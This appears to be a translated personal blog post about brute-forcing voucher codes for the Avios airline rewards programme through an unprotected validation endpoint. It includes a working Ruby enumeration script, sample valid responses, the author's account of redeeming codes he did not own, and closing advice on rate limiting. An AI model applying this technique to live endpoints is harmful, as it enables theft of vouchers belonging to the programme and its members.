If you are like me, you probably thought about the idea of ​​traveling the world first class for free, watched YouTube and know about such people.

This is a story about how I found a mistake in the Avios Travel rewards program that allows you to fulfill this dream * .

A couple of weeks ago I flew to New York. Since this is my first visit to the States and the first transatlantic flight, I was full of enthusiasm . You would also ask yourself the same questions:
')

Can I go to first grade? How to do it? What to say? How not to look like a freak when I make such a request?

Alas, only when you get to the airport you will realize that the registration process is mostly automated. Your chances of asking a beautiful girl at the front desk for a free upgrade are vanishingly small. But it made me think, how do people do it?


Aer Lingus Aer Club


British airways executive club

Welcome to airline loyalty programs.

Nothing extraordinary. People have long known about loyalty programs. But Avios has something unique. So what is it?

Avios points are general award points that are accepted at Aer Lingus, British Airways, Flybe, Iberia, kulula.com and Meridiana. By collecting Avios points in airplanes, hotels and car rentals, you can choose bonus flights in hundreds of destinations around the world.

After registering with Aer Lingus and British Airways loyalty programs, I came across this site . This is simply a form that allows a customer to enter information about his membership, some personal data and a reward code that was sent to him. Here it becomes interesting.

Implementation

Code example already used

Two things immediately caught my attention. First, it was clear from the form that a simple check of regular expressions is performed on the frontend to check the conformity of the format. Secondly, while entering the code, it is immediately displayed whether it is valid. This is done through an AJAX request.

Chrome’s developer tools have shown that network requests to check for code go to this URL . Then a thought occurred to me. If I know the format of the codes and I know the endpoint for checking the code, can I create 1000 random codes in this format and then write a script to iterate over them and check?

The answer is yes I can.

#!/usr/bin/ruby require 'httparty' require 'byebug' url = “https://www.aviosvouchers.com/en/Collect/ValidateCode" # [a-zA-Z]{3}[0–9]{3}[a-zA-Z]{1} puts “Running Script…” File.open('codes.txt', 'r').each_line do |line| data = line.split(/\t/) code = data.first.delete!(“\n”) request = HTTParty.post(url, body: {code: code.to_s}) json = JSON.parse(request.body) puts “#{json} — #{code.to_s}” if json['value'] > 0 sleep(0.5) end puts “Finished Running Script.” 

This script reads the list of generated codes in a text file (you can generate codes based on your own regular expressions or use something like the text-from-regex tool). It then sends a POST request to the specified URL. If we get a valid response (usually when the value attribute is greater than zero), then we send the response to the CLI, and then after a short pause we make the following request.

What is the result? List of RIGHT CODES ! (For obvious reasons, I changed the correct values ​​below).

{“status”=>”ok”, “message”=>”Valid”, “genericVoucherCode”=>”5007652532665", “value”=>10000.0, “itemId”=>nil} — JCX328W
{“status”=>”ok”, “message”=>”Valid”, “genericVoucherCode”=>”7186731101111", “value”=>10000.0, “itemId”=>nil} — MYS272Y
{“status”=>”ok”, “message”=>”Valid”, “genericVoucherCode”=>”7409825562501", “value”=>1500.0, “itemId”=>nil} — XSL523V
{“status”=>”ok”, “message”=>”Valid”, “genericVoucherCode”=>”2504822562501", “value”=>1500.0, “itemId”=>nil} — SYZ436G
{“status”=>”ok”, “message”=>”Valid”, “genericVoucherCode”=>”8476533219878", “value”=>20000.0, “itemId”=>nil} — PEG924R
{“status”=>”ok”, “message”=>”Valid”, “genericVoucherCode”=>”4318675747654", “value”=>500.0, “itemId”=>nil} — AHC939A
{“status”=>”ok”, “message”=>”Valid”, “genericVoucherCode”=>”6509522562501", “value”=>1500.0, “itemId”=>nil} — JGZ792E
{“status”=>”ok”, “message”=>”Valid”, “genericVoucherCode”=>”5904736483764", “value”=>500.0, “itemId”=>nil} — DMB882D

After several days of running the script, I received a lot of valid codes, and after adding these codes, my account looked like this.


BA Account Screenshot

215,010 Avios points. Yes it is a lot. So much so that I can fly from London to Indonesia first class for only 500 pounds. A hope awakened in me that my dreams would finally come true.

But dreams have not come true

After a while, I began to doubt the legality of such actions. If I book a flight and use these points, what will be the consequences? Common sense eventually won, so I decided to notify Avios about the problem before publishing this information. But it seems that they fixed the bug before I had time to report.


Endpoint verification code is no longer available.

The site is no longer instant check codes. Now for verification you need to send the whole form from the page. In addition, they seem to have noticed me and banned my account ...

(They also banned my Aer Lingus account, so I didn't have time to take a screenshot there).


Banned BA Account

Finally

What technical conclusions can be drawn from this? How was it possible to deploy the system from the very beginning to avoid problems? In fact, this is not difficult: you just need to limit the number and / or frequency of requests to the end point and make the codes non-deterministic, so that they are harder to guess .

1. Limit on requests.
2. Variables and non-deterministic codes.

Finally, if someone from Avios, British Airways or Aer Lingus reads this, I will be very grateful if they unlock my accounts. I would like to continue to accumulate real bonus points, like any normal person.

*Addition

I received a ton of posts on this topic, so let me be clear. I understand why people assume that I acted maliciously from the very beginning. With all sincerity I can assure you that this is not so, although many are unlikely to believe me. The fact that I used the codes I found is more related to excitement and excitement.